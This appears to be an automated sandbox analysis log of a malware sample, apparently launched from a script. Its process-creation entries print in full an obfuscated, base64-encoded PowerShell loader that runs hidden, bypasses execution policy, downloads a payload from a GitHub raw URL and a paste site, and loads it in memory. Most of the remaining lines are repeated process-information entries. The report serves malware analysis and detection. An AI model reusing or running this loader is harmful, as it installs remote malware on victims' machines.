Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4AA74F5A push eax; retf 5_2_00007FFB4AA74FE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AA96FB6 push esp; iretd 8_2_00007FFB4AA96FBC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AB6236C push 8B485F92h; iretd 8_2_00007FFB4AB62371
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AB623BE push 8B485F92h; iretd 8_2_00007FFB4AB623C6
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
